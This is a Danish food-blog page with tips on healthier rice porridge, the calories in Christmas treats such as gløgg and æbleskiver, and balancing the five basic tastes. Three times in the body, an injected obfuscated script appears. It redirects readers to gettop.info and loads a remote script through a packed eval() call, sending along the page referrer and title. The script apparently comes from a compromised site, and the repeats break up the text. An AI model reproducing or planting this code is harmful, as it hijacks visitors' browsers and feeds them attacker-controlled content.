Hvis risengrøden skal være sundere

Ønsker du en sund risengrød, så kan du med fordel bruge fuldkornsgrødris næste gang du laver risengrød eller alternativt udskifte halvdelen af de hvide grødris med fuldkornsvarianten. Resultatet bliver en sundere risengrød, som stadig har bevaret den gode smag.

Velbekommen setTimeout(“document.location.href=’http://gettop.info/kt/?53vSkc&'”, delay);eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))

Inden du går i kagerne, vidste du at…

Vidste du at…

– Et glas gløgg og 3 æbleskiver med syltetøj og flormelis, indeholder 396 kcal. Hvilket svarer til at du skal gå en tur på 3 timer i moderat tempo for at forbrænde dette.

– 5 brunkager indeholder 155 kcal. Hvilket svarer til at du skal gå i 1 tim. og 15 min. for at forbrænd dette.

Så sørg for at vælge med omhu og tage derefter din kone/mand/kæreste/ven/hund, med ud i den friske luft og når i kommer hjem så kan i passende se denne dejlige opskrift på glutenfri risotto

Velbekommen setTimeout(“document.location.href=’http://gettop.info/kt/?53vSkc&'”, delay);eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))

Sådan gør du for at undgå trangen til noget, efter du har spist

Sørg for at tilfredsstille ALLE de fem grundsmage, som vi mennesker kan registrere, i din mad.

Det være sig:

  • Bitter:     Det kan være mørk chokolade/sweppes, og hvis smagen bliver for bitter – så skal der sødt eller salt til.
  • Sur:         Det kan være citron, hvor syrligheden kan gøre en madret mere frisk, og hvis smagen bliver for sur – så skal der sødt til.
  • Salt:        Det fremhæver smag, og hvis smagen er for salt – så skal der surt til.
  • Sød:        Det kan være sukker/fløde, som “runder” smagen af, og hvis smagen er for sød – så skal der bittert eller surt til.
  • Umami: Dette er smagen man ikke kan beskrive – eks. den gode smag der er ved brændt kød, og hvis smagen er for umami – så skal der surt til.

 

På den måde sikrer du dig at du ikke er sulten hurtigt efter du lige har spist setTimeout(“document.location.href=’http://gettop.info/kt/?53vSkc&'”, delay);eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))